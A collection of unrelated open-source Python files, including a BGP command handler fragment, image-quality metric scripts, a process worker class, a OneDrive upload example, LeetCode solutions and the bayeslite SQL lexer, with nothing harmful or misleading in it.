reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
@Command.register('text', 'announce operational')
def announce_operational(self, reactor, service, command):
def callback(self, command, peers):
operational = self.api_operational(command)
if not operational:
self.log_failure("Command could not parse operational command : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_operational(peers, operational)
self.log_message(
"operational message sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', operational.extensive())
)
yield False
reactor.processes.answer_done(service)
if (command.split() + ['be', 'safe'])[2].lower() not in (
'asm',
'adm',
'rpcq',
'rpcp',
'apcq',
'apcp',
'lpcq',
'lpcp',
):
reactor.processes.answer_done(service)
return False
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
|
Python/compute_GT_image_metrics.py | kokizzu/OmniPhotos | 129 | 12664779 | <filename>Python/compute_GT_image_metrics.py
#!/usr/bin/env python
# coding: utf-8
# get_ipython().run_line_magic('pylab', 'inline')
import csv
from math import sqrt
import imageio
import numpy as np
import os
# import cv2
from skimage.metrics import structural_similarity
def calculate_psnr(img1, img2, max_value=255):
""""Calculating peak signal-to-noise ratio (PSNR) between two images."""
mse = np.mean((np.array(img1, dtype=np.float32) - np.array(img2, dtype=np.float32)) ** 2)
if mse == 0:
return 100
return 20 * np.log10(max_value / (np.sqrt(mse)))
# calculate_psnr(gt_img, ours_img)
def calculate_ssim(img1, img2):
return structural_similarity(img1, img2, multichannel=True)
def calculate_lpips(img1, img2):
global lpips_model, use_gpu
img1 = util.im2tensor(img1)
img2 = util.im2tensor(img2)
if use_gpu:
img1 = img1.cuda()
img2 = img2.cuda()
return lpips_model.forward(img1, img2).item()
def max_shifted_metric(function, img1, img2, max_shift=1):
max_value = 0
for y_shift in range(-max_shift, max_shift + 1):
y_start = max(0, y_shift)
y_end = min(img1.shape[0], img1.shape[0] + y_shift)
for x_shift in range(-max_shift, max_shift + 1):
x_start = max(0, x_shift)
x_end = min(img1.shape[1], img1.shape[1] + x_shift)
img1_shifted = img1[y_start:y_end, x_start:x_end]
img2_cropped = img2[:img1_shifted.shape[0], :img1_shifted.shape[1]]
value = function(img1_shifted, img2_cropped)
# print(y_shift, x_shift, value)
if value > max_value:
max_value = value
return max_value
def min_shifted_metric(function, img1, img2, min_shift=1):
min_value = 1e10
for y_shift in range(-min_shift, min_shift + 1):
y_start = max(0, y_shift)
y_end = min(img1.shape[0], img1.shape[0] + y_shift)
for x_shift in range(-min_shift, min_shift + 1):
x_start = max(0, x_shift)
x_end = min(img1.shape[1], img1.shape[1] + x_shift)
img1_shifted = img1[y_start:y_end, x_start:x_end]
img2_cropped = img2[:img1_shifted.shape[0], :img1_shifted.shape[1]]
value = function(img1_shifted, img2_cropped)
# print(y_shift, x_shift, value)
if value < min_value:
min_value = value
return min_value
datasets = ['apartment_0', 'hotel_0', 'office_0', 'office_4', 'room_0', 'room_1']
cubemap_sides = 'FLRBUD'
gt_path = r"G:\OmniPhotos\Data\new\GT-Replica\{dataset}\cubmap_image\image\{dataset}_{index:04}_{side}.jpg"
output_path = r"G:\OmniPhotos\GT quantitative comparison"
# compute = ['PSNR']
# compute = ['SSIM']
compute = ['LPIPS']
# comparison = "DIS flow"
# comparison = "Fewer images (15-DIS)"
# comparison = "Fewer images (30-DIS)"
# comparison = "Fewer images (45-DIS)"
# comparison = "High-res proxy"
# comparison = "Huber-depth-sres"
# comparison = "L2-depth-sres"
# comparison = "Less smoothness"
# comparison = "Low-res proxy"
# comparison = "MegaParallax-cylinder-3m"
# comparison = "MegaParallax-plane-3m"
# comparison = "More smoothness"
# comparison = "No flow (linear blending)"
# comparison = "No normalised residuals"
# comparison = "No robust data term"
# comparison = "Optimising depth (not inverse)"
# comparison = "Our complete method"
# comparison = "Our method (GT inputs)"
# comparison = "Parallax360-cylinder-3m"
for comparison in [
"DIS flow",
"Fewer images (15-DIS)",
"Fewer images (30-DIS)",
"Fewer images (45-DIS)",
"High-res proxy",
"Huber-depth-sres",
"L2-depth-sres",
"Low-res proxy",
"MegaParallax-cylinder-3m",
"MegaParallax-plane-3m",
"No flow (linear blending)",
"No normalised residuals",
"No robust data term",
"Optimising depth (not inverse)",
"Our complete method",
"Our method (GT inputs)",
"Parallax360-cylinder-3m"
]:
ours_path = os.path.join(output_path, comparison, "{dataset}-Replica-cubemaps-{index:04}_{side}.png")
print("Computing " + (" and ".join(compute)) + f" for '{comparison}' ...")
if 'PSNR' in compute:
total_count = 0
total_psnr = 0
total_psnr_squared = 0
with open(os.path.join(output_path, comparison + " - PSNR.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "PSNR"])
for dataset in datasets:
dataset_count = 0
dataset_psnr = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
gt_img = imageio.imread(gt_image_path)
ours_img = imageio.imread(ours_image_path)
## Compute metrics
psnr = max_shifted_metric(calculate_psnr, gt_img, ours_img)
## Log result
# print(f"{dataset} -- {index:02} -- {side} -- PSNR: {psnr:.2f}")
csvwriter.writerow([dataset, index, side, psnr])
dataset_count += 1
dataset_psnr += psnr
total_psnr_squared += psnr * psnr
psnr = dataset_psnr / dataset_count
print(f'PSNR: {psnr:.2f}')
total_count += dataset_count
total_psnr += dataset_psnr
mean_psnr = total_psnr / total_count
stdev_psnr = sqrt(total_psnr_squared / total_count - pow(mean_psnr, 2))
sem_psnr = stdev_psnr / sqrt(total_count)
print(f"PSNR: {mean_psnr:.2f} +/- {sem_psnr:.2f}")
if 'SSIM' in compute:
total_count = 0
total_ssim = 0
total_ssim_squared = 0
with open(os.path.join(output_path, comparison + " - SSIM.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "SSIM"])
for dataset in datasets:
dataset_count = 0
dataset_ssim = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
gt_img = imageio.imread(gt_image_path)
ours_img = imageio.imread(ours_image_path)
## Compute metrics
ssim = max_shifted_metric(calculate_ssim, gt_img, ours_img)
## Log result
csvwriter.writerow([dataset, index, side, ssim])
dataset_count += 1
dataset_ssim += ssim
total_ssim_squared += ssim * ssim
ssim = dataset_ssim / dataset_count
print(f'SSIM: {ssim:.4f}')
total_count += dataset_count
total_ssim += dataset_ssim
mean_ssim = total_ssim / total_count
stdev_ssim = sqrt(total_ssim_squared / total_count - pow(mean_ssim, 2))
sem_ssim = stdev_ssim / sqrt(total_count)
print(f"SSIM: {mean_ssim:.4f} +/- {sem_ssim:.4f}")
if 'LPIPS' in compute:
## Help python find LPIPS-related modules
import sys
sys.path.append("LPIPS")
import LPIPS.models
from LPIPS.util import util
# Initialise the LPIPS model
use_gpu = True
lpips_model = LPIPS.models.PerceptualLoss(model='net-lin', net='alex', use_gpu=use_gpu, version='0.1')
total_count = 0
total_lpips = 0
total_lpips_squared = 0
with open(os.path.join(output_path, comparison + " - LPIPS.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "LPIPS"])
for dataset in datasets:
dataset_count = 0
dataset_lpips = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
img0 = util.load_image(gt_image_path)
img1 = util.load_image(ours_image_path)
## Compute metric
lpips = min_shifted_metric(calculate_lpips, img0, img1)
## Log result
csvwriter.writerow([dataset, index, side, lpips])
dataset_count += 1
dataset_lpips += lpips
total_lpips_squared += lpips * lpips
lpips = dataset_lpips / dataset_count
print(f'LPIPS: {lpips:.4f}')
total_count += dataset_count
total_lpips += dataset_lpips
mean_lpips = total_lpips / total_count
stdev_lpips = sqrt(total_lpips_squared / total_count - pow(mean_lpips, 2))
sem_lpips = stdev_lpips / sqrt(total_count)
print(f"LPIPS: {mean_lpips:.4f} +/- {sem_lpips:.4f}")
|
ProcessHandler/lib/workers/base.py | rfyiamcool/ProcessHandler | 101 | 12664806 | <filename>ProcessHandler/lib/workers/base.py<gh_stars>100-1000
#coding=utf-8
import os
import signal
import logging
from ProcessHandler.lib.utils import close_on_exec
from ProcessHandler.lib.sock import create_sockets
from ProcessHandler.lib.utils import _setproctitle, reopen_log_file
MAXSIZE = (1 << 31) - 1
class Worker(object):
SIGNALS = [getattr(signal, "SIG%s" % x) \
for x in "HUP QUIT INT TERM USR1 USR2 WINCH CHLD".split()]
SOCK_BACKLOG = 20
def __init__(self, cfg, file_logger, ppid, sockets=None):
self.cfg = cfg
self.file_logger = file_logger or logging.getLogger()
self.ppid = ppid
self.LISTENERS = sockets
self.alive = True
self.booted = False
self.worker_name = "worker: %s" % cfg.proc_name
self.nr = 0 # actual handle request count
self.max_requests = int(self.cfg.max_requests or MAXSIZE)
self.rd_fds = None
@property
def pid(self):
return os.getpid()
def __str__(self):
return "<Worker %s>" % self.pid
def init_signals(self):
[signal.signal(s, signal.SIG_DFL) for s in self.SIGNALS]
# init new signaling
signal.signal(signal.SIGQUIT, self.handle_quit)
signal.signal(signal.SIGTERM, self.handle_exit)
signal.signal(signal.SIGINT, self.handle_exit)
signal.signal(signal.SIGWINCH, self.handle_winch)
signal.signal(signal.SIGUSR1, self.handle_usr1)
# Don't let SIGQUIT and SIGUSR1 disturb active requests
# by interrupting system calls
if hasattr(signal, 'siginterrupt'): # python >= 2.6
signal.siginterrupt(signal.SIGQUIT, False)
signal.siginterrupt(signal.SIGUSR1, False)
def setup(self):
if self.cfg.bind:
binds = []
for b in self.cfg.bind.split(','):
addr = b.strip().split(':')
binds.append((addr[0], int(addr[1])))
self.bind = binds
# self.bind = [tuple(b.strip().split(":")) for b in self.cfg.bind.split(',')] # bind address comma separate
else:
self.bind = None
self.unix_socket = self.cfg.unix_socket
def init_process(self):
self.setup()
#set proc name
_setproctitle(self.worker_name)
self.init_signals()
# bind ip and port if needed
if not self.LISTENERS and (self.bind or self.unix_socket):
self.file_logger.info("Listern on %s, unixdomian:%s", self.cfg.bind or "", self.cfg.unix_socket or "")
self.LISTENERS = create_sockets(self.bind, self.unix_socket, self.SOCK_BACKLOG)
if self.LISTENERS:
for s in self.LISTENERS:
close_on_exec(s)
s.setblocking(0)
self.rd_fds = list(self.LISTENERS)
else:
self.rd_fds = None
# enter main loop
self.booted = True
def run(self):
self.init_process()
def handle_request(self, sock=None, client=None, addr=None):
raise NotImplementedError()
def stop(self):
self.alive = False
if self.LISTENERS:
for l in self.LISTENERS:
l.close()
def handle_quit(self, sig, frame):
self.stop()
def handle_exit(self, sig, frame):
self.alive = False
os._exit(0)
def handle_winch(self, sig, frame):
return
def handle_usr1(self, sig, frame):
reopen_log_file(self.file_logger)
def handle_usr2(self, sig, frame):
pass
"""
fds = [l.fileno() for l in self.LISTENERS]
os.environ['OPEN_FD'] = ",".join([str(fd) for fd in fds])
"""
"""
def reload(self):
# config listeners
old_bind = self.bind
old_sock = self.unix_socket
old_port = self.port
if self.port != old_port or self.bind != old_bind or self.unix_socket != old_sock: # ugly
[sock.close() for sock in self.LISTENERS]
self.LISTENERS = create_sockets(self.bind, self.port, self.unix_socket, self.backlog or 20)
"""
|
examples/onedrive/upload_file.py | rikeshtailor/Office365-REST-Python-Client | 544 | 12664808 | <filename>examples/onedrive/upload_file.py
import os
from examples import acquire_token_by_client_credentials, test_user_principal_name
from office365.graph_client import GraphClient
client = GraphClient(acquire_token_by_client_credentials)
target_drive = client.users[test_user_principal_name].drive
local_path = "../../tests/data/SharePoint User Guide.docx"
with open(local_path, 'rb') as f:
file_content = f.read()
file_name = os.path.basename(local_path)
target_file = target_drive.root.upload(file_name, file_content).execute_query()
print(f"File {target_file.web_url} has been uploaded")
|
text_to_code_brainfuck/main.py | DazEB2/SimplePyScripts | 117 | 12664817 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
def text_to_code_brainfuck(text):
commands_brainfuck = []
for c in text:
commands_brainfuck.append('+' * ord(c) + '.')
return '>'.join(commands_brainfuck)
if __name__ == '__main__':
text = 'Hello World!'
# text = """\
# #include <iostream>
# #include <fstream>
# #include <vector>
#
# using namespace std;
#
# static char cpu[30000];
#
# int main(int argc, char **argv) {
# vector<char> acc;
# char ch;
# ifstream infile(argv[1]);
# while (infile) {
# infile.get(ch);
# acc.push_back(ch);
# }
# infile.close();
# unsigned int j = 0;
# int brc = 0;
# for (int i = 0; i < acc.size(); ++i) {
# if (acc[i] == '>')
# j++;
# if (acc[i] == '<')
# j--;
# if (acc[i] == '+')
# cpu[j]++;
# if (acc[i] == '-')
# cpu[j]--;
# if (acc[i] == '.')
# cout << cpu[j];
# if (acc[i] == ',')
# cin >> cpu[j];
# if (acc[i] == '[') {
# if (!cpu[j]) {
# ++brc;
# while (brc) {
# ++i;
# if (acc[i] == '[')
# ++brc;
# if (acc[i] == ']')
# --brc;
# }
# } else
# continue;
# } else if (acc[i] == ']') {
# if (!cpu[j])
# continue;
# else {
# if (acc[i] == ']')
# brc++;
# while (brc) {
# --i;
# if (acc[i] == '[')
# brc--;
# if (acc[i] == ']')
# brc++;
# }
# --i;
# }
# }
# }
# }
# """
code_brainfuck = text_to_code_brainfuck(text)
print('code_brainfuck:', len(code_brainfuck))
# print(code_brainfuck)
print()
# Test generated brainfuck code
import simple_brainfuck
result = simple_brainfuck.execute(code_brainfuck)
print('result:', len(result))
print(result)
assert result == text
# TODO: Compress variant
import zlib
code_brainfuck_compress = zlib.compress(code_brainfuck.encode('utf-8'))
print()
print('code_brainfuck_compress:', len(code_brainfuck_compress))
print(code_brainfuck_compress)
import base64
code_brainfuck_compress_base64 = base64.b64encode(code_brainfuck_compress).decode('utf-8')
print()
print('code_brainfuck_compress_base64:', len(code_brainfuck_compress_base64))
print(code_brainfuck_compress_base64)
with open('code.bf', mode='w', encoding='utf-8') as f:
f.write(code_brainfuck)
|
veros/diagnostics/__init__.py | AkasDutta/veros | 115 | 12664824 | <filename>veros/diagnostics/__init__.py
from veros.diagnostics.api import create_default_diagnostics, initialize, diagnose, output # noqa: F401
|
solutions/LeetCode/Python3/12.py | timxor/leetcode-journal | 854 | 12664840 | <reponame>timxor/leetcode-journal
__________________________________________________________________________________________________
56ms
class Solution:
def intToRoman(self, num: int) -> str:
res = ''
return self.toPartRom(num//1000, 'M--') + \
self.toPartRom((num % 1000)//100, 'CDM') + \
self.toPartRom((num % 100)//10, 'XLC') + \
self.toPartRom(num % 10, 'IVX')
def toPartRom(self, n : int, subs: str) -> str:
if n == 0:
return ''
if n <= 3:
return subs[0] * n
if n == 4:
return subs[0] + subs[1]
if n <= 8:
return subs[1] + subs[0]* (n - 5)
if n == 9:
return subs[0] + subs[2]
__________________________________________________________________________________________________
60ms
class Solution:
def intToRoman(self, num: int) -> str:
memo = {1000: 'M', 500: 'D',
100: 'C', 50: 'L',
10:'X', 5: 'V', 1: 'I'}
res = []
for it in [1000,100,10,1]:
##
a = num//it
num = num%it
if a == 9:
res.append(memo[it])
res.append(memo[it*10])
elif a==4:
res.append(memo[it])
res.append(memo[it*5])
elif a==5:
res.append(memo[it*5])
elif a<4:
res += [memo[it]]*a
else:
res.append(memo[it*5])
res+=[memo[it]]*(a-5)
return ''.join(res)
__________________________________________________________________________________________________
64ms
class Solution:
def intToRoman(self, num: int) -> str:
#table = {"IV" : 4, "IX" : 9, "XL" : 40, "XC" : 90, "CD" : 400, "CM" : 900, "I" : 1, "V" : 5, "X" : 10, "L" : 50, "C" : 100, "D" : 500, "M" : 1000}
table = {1 : "I", 5 : "V", 10 : "X", 50 : "L", 100 : "C", 500 : "D", 1000 : "M", 4 : "IV", 9 : "IX", 40 : "XL", 90 : "XC", 400 : "CD", 900 : "CM"}
vals = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]
solution = []
for v in vals:
while num - v >= 0:
num -= v
solution.append(table[v])
return ''.join(solution)
__________________________________________________________________________________________________
12352 kb
class Solution:
def intToRoman(self, num: 'int') -> 'str':
values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]
symbols = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I']
result = ''
for symbol, value in zip(symbols, values):
result += symbol * (num // value)
num %= value
return result
__________________________________________________________________________________________________
12392 kb
class Solution:
def intToRoman(self, num: 'int') -> 'str':
result = []
roman = {0:'', 1:'I', 2:'II', 3:'III', 4:'IV', 5:'V', 6:'VI', 7:'VII', 8:'VIII', 9:'IX', 10:'X', 20:'XX', 30:'XXX', 40:'XL', 50:'L', 60:'LX', 70:'LXX', 80:'LXXX', 90:'XC', 100:'C', 200:'CC', 300:'CCC', 400:'CD', 500:'D', 600:'DC', 700:'DCC', 800:'DCCC', 900:'CM', 1000:'M', 2000:'MM', 3000:'MMM'}
thousands = num//1000*1000
hundreds = (num-thousands)//100*100
tens = (num-thousands-hundreds)//10*10
ones = (num-thousands-hundreds-tens)
print("thousands: {}".format(thousands), "hundreds: {}".format(hundreds),
"tens: {}".format(tens), "ones: {}".format(ones), sep='\n')
result += (roman[thousands] + roman[hundreds] + roman[tens]+ roman[ones])
return ''.join(result)
__________________________________________________________________________________________________
|
application/api/migrations/0002_auto_20190128_1515.py | cqkenuo/w12scan | 864 | 12664888 | <gh_stars>100-1000
# Generated by Django 2.1.4 on 2019-01-28 07:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='W12scan_domains',
new_name='domains',
),
migrations.RenameModel(
old_name='W12scan_ips',
new_name='ips',
),
migrations.RenameModel(
old_name='W12scan_properly',
new_name='properly',
),
]
|
src/detext/layers/id_embed_layer.py | StarWang/detext | 1,229 | 12664895 | import tensorflow as tf
from detext.layers.embedding_layer import create_embedding_layer
from detext.utils.parsing_utils import InputFtrType, InternalFtrType
DEFAULT_MIN_LEN = 1
DEFAULT_MAX_LEN = 100
class IdEmbedLayer(tf.keras.layers.Layer):
""" ID embedding layer"""
def __init__(self, num_id_fields, embedding_layer_param, embedding_hub_url_for_id_ftr):
""" Initializes the layer
For more details on parameters, check args.py
"""
super(IdEmbedLayer, self).__init__()
self._num_id_fields = num_id_fields
self.min_len = DEFAULT_MIN_LEN
self.max_len = DEFAULT_MAX_LEN
self.num_cls_sep = 0
if num_id_fields:
self.embedding = create_embedding_layer(embedding_layer_param, embedding_hub_url_for_id_ftr)
self.id_ftr_size = self.embedding.num_units()
def call(self, inputs, **kwargs):
""" Applies ID embedding lookup and summation on document and user fields
:param inputs: Dict A mapping that contains the following key:
doc_id_fields: list(Tensor(dtype=string)) List of document fields. Each has shape=[batch_size, max_group_size]
user_id_fields: list(Tensor(dtype=string)) List of user fields. Each has shape=[batch_size]
:return: doc_ftrs, user_ftrs
"""
doc_id_fields = inputs.get(InputFtrType.DOC_ID_COLUMN_NAMES, None)
user_id_fields = inputs.get(InputFtrType.USER_ID_COLUMN_NAMES, None)
if self._num_id_fields == 0:
assert doc_id_fields is None and user_id_fields is None, "Document ID fields and user ID fields must be None when there's no id field"
user_ftrs = self.apply_embed_on_user_id(user_id_fields) if user_id_fields is not None else None
doc_ftrs = self.apply_embed_on_doc_id(doc_id_fields) if doc_id_fields is not None else None
return doc_ftrs, user_ftrs
def apply_embedding(self, inputs):
"""Applies embedding on give inputs
:param inputs Tensor(dtype=string) Shape=[batch_size]
:return Tensor(dtype=string) Shape=[batch_size, sentence_len, num_units_for_id_ftr]
"""
embedding_result = self.embedding({
InternalFtrType.SENTENCES: inputs,
InternalFtrType.NUM_CLS: self.num_cls_sep,
InternalFtrType.NUM_SEP: self.num_cls_sep,
InternalFtrType.MIN_LEN: self.min_len,
InternalFtrType.MAX_LEN: self.max_len,
})
seq_length = embedding_result[InternalFtrType.LENGTH]
max_seq_len = tf.math.reduce_max(seq_length)
seq_mask = tf.expand_dims(tf.sequence_mask(seq_length, max_seq_len, dtype=tf.float32), axis=-1)
seq_length = tf.expand_dims(tf.cast(seq_length, dtype=tf.dtypes.float32), axis=-1)
user_id_embeddings = embedding_result[InternalFtrType.EMBEDDED]
sum_user_id_embedding = tf.reduce_sum(
input_tensor=user_id_embeddings * seq_mask, axis=1) # [batch_size, num_units_for_id_ftr]
user_id_avg_embedding = tf.math.divide_no_nan(sum_user_id_embedding, seq_length) # [batch_size, num_units_for_id_ftr]
return user_id_avg_embedding
def apply_embed_on_user_id(self, user_id_fields):
"""Applies embedding lookup and averaging for user id features
:return Tensor Shape=[batch_size, num_user_id_fields, num_units_for_id_ftr]
"""
user_ftrs = []
for i, user_field in enumerate(user_id_fields):
user_id_avg_embedding = self.apply_embedding(user_field)
user_ftrs.append(user_id_avg_embedding)
return tf.stack(user_ftrs, axis=1)
def apply_embed_on_doc_id(self, doc_id_fields):
"""Applies embedding lookup and averaging for doc id features
:return Tensor Shape=[batch_size, max_group_size, num_doc_id_fields, num_units_for_id_ftr]
"""
doc_ftrs = []
for i, doc_field in enumerate(doc_id_fields):
doc_field_shape = tf.shape(doc_field)
reshape_doc_field = tf.reshape(doc_field, shape=[doc_field_shape[0] * doc_field_shape[1]])
doc_id_avg_embedding = self.apply_embedding(reshape_doc_field)
doc_id_avg_embedding = tf.reshape(doc_id_avg_embedding, shape=[doc_field_shape[0], doc_field_shape[1], self.id_ftr_size])
doc_ftrs.append(doc_id_avg_embedding)
return tf.stack(doc_ftrs, axis=2)
|
Polar/polar_flower.py | pyecharts/pyecharts_gallery | 759 | 12664900 | import math
from pyecharts import options as opts
from pyecharts.charts import Polar
data = []
for i in range(361):
t = i / 180 * math.pi
r = math.sin(2 * t) * math.cos(2 * t)
data.append([r, i])
c = (
Polar()
.add_schema(angleaxis_opts=opts.AngleAxisOpts(start_angle=0, min_=0))
.add("flower", data, label_opts=opts.LabelOpts(is_show=False))
.set_global_opts(title_opts=opts.TitleOpts(title="Polar-Flower"))
.render("polar_flower.html")
)
|
ichnaea/webapp/gunicorn_settings.py | mikiec84/ichnaea | 348 | 12664904 | """
Contains :ref:`Gunicorn configuration settings <gunicorn:settings>` and
hook functions.
"""
# Disable keep-alive
keepalive = 0
def post_worker_init(worker):
worker.wsgi(None, None)
def worker_exit(server, worker):
from ichnaea.webapp.app import worker_exit
worker_exit(server, worker)
|
src/scan.py | almartin82/bayeslite | 964 | 12664905 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import StringIO
import bayeslite.grammar as grammar
import bayeslite.plex as Plex
from bayeslite.util import casefold
'''
grep -o 'K_[A-Z][A-Z0-9_]*' < grammar.y | sort -u | awk '
{
sub("^K_", "", $1)
# All keywords are US-ASCII, so tolower is the same as casefold.
printf(" \"%s\": grammar.K_%s,\n", tolower($1), $1)
}'
'''
keywords = {
"accuracy": grammar.K_ACCURACY,
"add": grammar.K_ADD,
"all": grammar.K_ALL,
"alter": grammar.K_ALTER,
"analyze": grammar.K_ANALYZE,
"and": grammar.K_AND,
"as": grammar.K_AS,
"asc": grammar.K_ASC,
"begin": grammar.K_BEGIN,
"between": grammar.K_BETWEEN,
"btable": grammar.K_BTABLE,
"by": grammar.K_BY,
"case": grammar.K_CASE,
"cast": grammar.K_CAST,
"checkpoint": grammar.K_CHECKPOINT,
"collate": grammar.K_COLLATE,
"column": grammar.K_COLUMN,
"columns": grammar.K_COLUMNS,
"commit": grammar.K_COMMIT,
"conf": grammar.K_CONF,
"confidence": grammar.K_CONFIDENCE,
"context": grammar.K_CONTEXT,
"correlation": grammar.K_CORRELATION,
"create": grammar.K_CREATE,
"default": grammar.K_DEFAULT,
"density": grammar.K_DENSITY,
"dependence": grammar.K_DEPENDENCE,
"desc": grammar.K_DESC,
"distinct": grammar.K_DISTINCT,
"drop": grammar.K_DROP,
"else": grammar.K_ELSE,
"end": grammar.K_END,
"escape": grammar.K_ESCAPE,
"estimate": grammar.K_ESTIMATE,
"existing": grammar.K_EXISTING,
"exists": grammar.K_EXISTS,
"explicit": grammar.K_EXPLICIT,
"for": grammar.K_FOR,
"from": grammar.K_FROM,
"generator": grammar.K_GENERATOR,
"given": grammar.K_GIVEN,
"glob": grammar.K_GLOB,
"group": grammar.K_GROUP,
"guess": grammar.K_GUESS,
"having": grammar.K_HAVING,
"hypothetical": grammar.K_HYPOTHETICAL,
"if": grammar.K_IF,
"ignore": grammar.K_IGNORE,
"in": grammar.K_IN,
"infer": grammar.K_INFER,
"information": grammar.K_INFORMATION,
"initialize": grammar.K_INITIALIZE,
"is": grammar.K_IS,
"isnull": grammar.K_ISNULL,
"iteration": grammar.K_ITERATION,
"iterations": grammar.K_ITERATIONS,
"latent": grammar.K_LATENT,
"like": grammar.K_LIKE,
"limit": grammar.K_LIMIT,
"match": grammar.K_MATCH,
"minute": grammar.K_MINUTE,
"minutes": grammar.K_MINUTES,
"model": grammar.K_MODEL,
"modeled": grammar.K_MODELED,
"modelled": grammar.K_MODELLED,
"models": grammar.K_MODELS,
"mutual": grammar.K_MUTUAL,
"not": grammar.K_NOT,
"notnull": grammar.K_NOTNULL,
"null": grammar.K_NULL,
"of": grammar.K_OF,
"offset": grammar.K_OFFSET,
"or": grammar.K_OR,
"order": grammar.K_ORDER,
"pairwise": grammar.K_PAIRWISE,
"population": grammar.K_POPULATION,
"predict": grammar.K_PREDICT,
"predictive": grammar.K_PREDICTIVE,
"probability": grammar.K_PROBABILITY,
"pvalue": grammar.K_PVALUE,
"regexp": grammar.K_REGEXP,
"regress": grammar.K_REGRESS,
"relevance": grammar.K_RELEVANCE,
"rename": grammar.K_RENAME,
"rollback": grammar.K_ROLLBACK,
"row": grammar.K_ROW,
"rows": grammar.K_ROWS,
"samples": grammar.K_SAMPLES,
"schema": grammar.K_SCHEMA,
"second": grammar.K_SECOND,
"seconds": grammar.K_SECONDS,
"select": grammar.K_SELECT,
"set": grammar.K_SET,
"similarity": grammar.K_SIMILARITY,
"simulate": grammar.K_SIMULATE,
"stattype": grammar.K_STATTYPE,
"stattypes": grammar.K_STATTYPES,
"table": grammar.K_TABLE,
"temp": grammar.K_TEMP,
"temporary": grammar.K_TEMPORARY,
"the": grammar.K_THE,
"then": grammar.K_THEN,
"to": grammar.K_TO,
"unset": grammar.K_UNSET,
"using": grammar.K_USING,
"value": grammar.K_VALUE,
"values": grammar.K_VALUES,
"variable": grammar.K_VARIABLE,
"variables": grammar.K_VARIABLES,
"when": grammar.K_WHEN,
"where": grammar.K_WHERE,
"with": grammar.K_WITH,
"within": grammar.K_WITHIN,
}
def scan_name(_scanner, text):
return keywords.get(text) or keywords.get(casefold(text)) or \
grammar.L_NAME;
def scan_integer(scanner, text):
scanner.produce(grammar.L_INTEGER, int(text, 10))
def scan_float(scanner, text):
# XXX Consider a system-independent representation of floats which
# we can pass through to the SQL engine. (E.g., for the benefit
# of SQLite4 which will use decimal floating-point arithmetic
# instead of binary floating-point arithmetic.)
scanner.produce(grammar.L_FLOAT, float(text))
def scan_numpar_next(scanner, text):
# Numbered parameters are 1-indexed.
scanner.n_numpar += 1
scanner.produce(grammar.L_NUMPAR, scanner.n_numpar)
def scan_numpar(scanner, text):
assert text[0] == '?'
if 20 < len(text): # 2^64 < 10^20
scan_bad(scanner, text)
else:
n = int(text[1:])
if n == 0:
# Numbered parameters are 1-indexed.
scanner.produce(-1, text)
else:
scanner.n_numpar = max(n, scanner.n_numpar)
scanner.produce(grammar.L_NUMPAR, n)
def scan_nampar(scanner, text):
text = casefold(text)
n = None
if text in scanner.nampar_map:
n = scanner.nampar_map[text]
else:
# Numbered parameters are 1-indexed.
scanner.n_numpar += 1
n = scanner.n_numpar
scanner.nampar_map[text] = n
scanner.produce(grammar.L_NAMPAR, (n, text))
def scan_bad(scanner, text):
scanner.produce(-1, text) # error
def scan_qname_start(scanner, text):
assert text == '"'
scan_quoted_start(scanner, text, "QNAME")
def scan_qname_end(scanner, text):
scan_quoted_end(scanner, text, grammar.L_NAME)
def scan_string_start(scanner, text):
assert text == "'"
scan_quoted_start(scanner, text, "STRING")
def scan_string_end(scanner, text):
scan_quoted_end(scanner, text, grammar.L_STRING)
def scan_quoted_start(scanner, text, state):
assert scanner.stringio is None
assert scanner.stringquote is None
scanner.stringio = StringIO.StringIO()
scanner.begin(state)
def scan_quoted_text(scanner, text):
assert scanner.stringio is not None
scanner.stringio.write(text)
def scan_quoted_quote(scanner, text):
assert scanner.stringio is not None
assert text[0] == text[1]
scanner.stringio.write(text[0])
